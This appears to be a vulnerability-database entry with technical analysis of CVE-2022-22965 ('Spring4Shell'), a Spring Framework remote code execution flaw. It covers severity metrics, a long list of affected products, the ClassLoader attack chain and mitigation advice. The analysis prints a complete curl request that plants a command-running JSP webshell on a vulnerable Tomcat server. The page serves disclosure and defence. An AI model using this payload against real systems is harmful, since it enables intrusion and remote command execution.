Attacker Value
High
(1 user assessed)
Exploitability
Low
(1 user assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
7

CVE-2022-22965

Disclosure Date: April 01, 2022
Exploited in the Wild
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Initial Access
Techniques
Validation
Validated

Description

A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.

Add Assessment

2
Ratings
  • Attacker Value
    High
  • Exploitability
    Low
Technical Analysis

It’s currently difficult to assess the exact value of this vulnerability because we don’t know how common the vulnerable configuration is. We might not even be aware of all the vulnerable configurations at this time. See the Rapid7 analysis for additional details.

CVSS V3 Severity and Metrics
Base Score:
9.8 Critical
Impact Score:
5.9
Exploitability Score:
3.9
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • cisco,
  • oracle,
  • siemens,
  • veritas,
  • vmware

Products

  • access appliance 7.4.3,
  • access appliance 7.4.3.100,
  • access appliance 7.4.3.200,
  • commerce platform 11.3.2,
  • communications cloud native core automated test suite 1.9.0,
  • communications cloud native core automated test suite 22.1.0,
  • communications cloud native core binding support function 22.1.3,
  • communications cloud native core console 1.9.0,
  • communications cloud native core console 22.1.0,
  • communications cloud native core network exposure function 22.1.0,
  • communications cloud native core network function cloud native environment 1.10.0,
  • communications cloud native core network function cloud native environment 22.1.0,
  • communications cloud native core network repository function 1.15.0,
  • communications cloud native core network repository function 22.1.0,
  • communications cloud native core network slice selection function 1.15.0,
  • communications cloud native core network slice selection function 1.8.0,
  • communications cloud native core network slice selection function 22.1.0,
  • communications cloud native core policy 1.15.0,
  • communications cloud native core policy 22.1.0,
  • communications cloud native core security edge protection proxy 1.7.0,
  • communications cloud native core security edge protection proxy 22.1.0,
  • communications cloud native core unified data repository 1.15.0,
  • communications cloud native core unified data repository 22.1.0,
  • communications policy management 12.6.0.0.0,
  • communications unified inventory management 7.4.1,
  • communications unified inventory management 7.4.2,
  • communications unified inventory management 7.5.0,
  • cx cloud agent,
  • financial services analytical applications infrastructure 8.1.1,
  • financial services analytical applications infrastructure 8.1.2.0,
  • financial services behavior detection platform 8.1.1.0,
  • financial services behavior detection platform 8.1.1.1,
  • financial services behavior detection platform 8.1.2.0,
  • financial services enterprise case management 8.1.1.0,
  • financial services enterprise case management 8.1.1.1,
  • financial services enterprise case management 8.1.2.0,
  • flex appliance 1.3,
  • flex appliance 2.0,
  • flex appliance 2.0.1,
  • flex appliance 2.0.2,
  • flex appliance 2.1,
  • mysql enterprise monitor,
  • netbackup appliance 4.0,
  • netbackup appliance 4.0.0.1,
  • netbackup appliance 4.1,
  • netbackup appliance 4.1.0.1,
  • netbackup flex scale appliance 2.1,
  • netbackup flex scale appliance 3.0,
  • netbackup virtual appliance 4.0,
  • netbackup virtual appliance 4.0.0.1,
  • netbackup virtual appliance 4.1,
  • netbackup virtual appliance 4.1.0.1,
  • operation scheduler,
  • product lifecycle analytics 3.6.1,
  • retail bulk data integration 16.0.3,
  • retail customer management and segmentation foundation 17.0,
  • retail customer management and segmentation foundation 18.0,
  • retail customer management and segmentation foundation 19.0,
  • retail financial integration 14.1.3.2,
  • retail financial integration 15.0.3.1,
  • retail financial integration 16.0.3,
  • retail financial integration 19.0.1,
  • retail integration bus 14.1.3.2,
  • retail integration bus 15.0.3.1,
  • retail integration bus 16.0.3,
  • retail integration bus 19.0.1,
  • retail merchandising system 16.0.3,
  • retail merchandising system 19.0.1,
  • retail xstore point of service 20.0.1,
  • retail xstore point of service 21.0.0,
  • sd-wan edge 9.0,
  • sd-wan edge 9.1,
  • simatic speech assistant for machines,
  • sinec network management system,
  • sipass integrated 2.80,
  • sipass integrated 2.85,
  • siveillance identity 1.5,
  • siveillance identity 1.6,
  • spring framework,
  • weblogic server 12.2.1.3.0,
  • weblogic server 12.2.1.4.0,
  • weblogic server 14.1.1.0.0
Technical Analysis

On March 30, 2022, rumors began to circulate about an unpatched remote code execution vulnerability in Spring Framework after a researcher published and quickly deleted a technical writeup and proof-of-concept (PoC) exploit code. The writeup and code targeted a zero-day vulnerability in Spring Framework. After multiple security vendors confirmed the vulnerability, including Rapid7, Spring confirmed it as a ClassLoader manipulation vulnerability on March 31, 2022. The vulnerability is being referred to as “Spring4Shell” and has been assigned CVE-2022-22965. The assigning CNA, VMware, scored the vulnerability CVSSv3 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). At this time, the CVE entry has not been populated by MITRE of NVD.

A number of proof of concept exploits exist. To date, they all target applications running on top of Tomcat. Rapid7, GreyNoise, and BadPackets have all observed in-the-wild exploitation and/or scanning attempts. However, the activity appears limited to a small number of actors. Given the very specific configuration requirements for a target to be exploitable, it’s unclear if opportunistic exploitation will ever be viable. We should get more clarity on that as companies review their products and issue patches.

The requirements for an application to be vulnerable follow:

  • They must use a vulnerable version of Spring Framework. Spring stated the currently maintained branches, 5.3 and 5.2, are vulnerable up to versions 5.3.17 and 5.2.19 respectively. Rapid7’s testing further indicated that end-of-life (EOL) versions such as 5.1, 5.0 and 4.3 are also vulnerable. EOL versions are unlikely to get patched.
  • The application must be running on a version of Java greater than 8. The vulnerability is directly related to a change made in Java 9 and beyond.
  • The application must uses one of the various request mapping annotations (e.g. @RequestMapping, @PostMapping, @PutMapping, etc) and the associated method must accept at least one plain old java object (POJO) parameter without using a @RequestBody annotation.

Current proof of concept exploits also require the vulnerable application to use Tomcat. We’ll discuss why a little further down.

Analysis

Spring fixed CVE-2022-22965 in commit 002546b3e4b8d791ea6acccb81eb3168f51abb15. The commit adds checks to the CachedIntrospectionResults method to ensure that attackers cannot access the ClassLoader via the Java Class getModule method. Spring likely did not anticipate that the getModule method would be introduced to Class in Java 9 (or any version), resulting in this oversight.

Access to the ClassLoader does not immediately grant the attacker code execution. Exploitation will depend on a variety of factors, but most important what the ClassLoader exposes. Tomcat uses a particularly useful ClassLoader for attacks. That’s because the TomCat ClassLoader, WebappClassLoaderBase, allows the attacker to reach down into the Tomcat logging functionality and write files to disk. This is a known technique that has been used as far back as 2014, and it’s exactly what the original proof of concept did.

The attack chain, when used in the original exploit, looks like this:

class.module.classLoader.resources.context.parent.pipeline.first

This can be translated into the following calls:

The original exploit then manipulates the valve’s attributes in order to write an arbitrary file to webapp/ROOT/. It specifically alters five attributes:

  1. pattern: the webshell’s content
  2. suffix: the webshell’s extension (.jsp)
  3. directory: the directory to write to (webapps/ROOT/)
  4. prefix: the filename (tomcatwar)
  5. fileDateFormat: blank so that Tomcat doesn’t muck up the file with timestamps.

This can all be combined into a single curl request:

curl -v -d "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" http://localhost:8080/vulnerable-1.0.0.0/rapid7

To test this yourself, please check out this intentionally vulnerable application on GitHub. Thank you to the community for adding a Docker file!

The original proof of concept shows one way to go about exploiting this vulnerability. Motivated hackers are very clever. They will likely find new techniques and custom ClassLoaders to abuse.

Detection, Mitigation, and Patching

Ideally, we like to have a detection section here. However, successful exploitation does not appear to cause any specific logging. The best advice, as far as detection goes, is to continue monitoring your web server’s for webshells and use WAF/IDS that can detect these types of attacks on the wire.

Spring has released patches for this vulnerability. In an ideal world, everyone would just update. However, upgrading is not always possible and we’ve heard that upgrading Spring Framework can be non-trivial. A variety of organizations have offered mitigation advice, including Spring themselves, so we won’t repeat the guidance here. We only encourage you to treat this as a priority, and to patch or mitigate whether you are using Tomcat or not.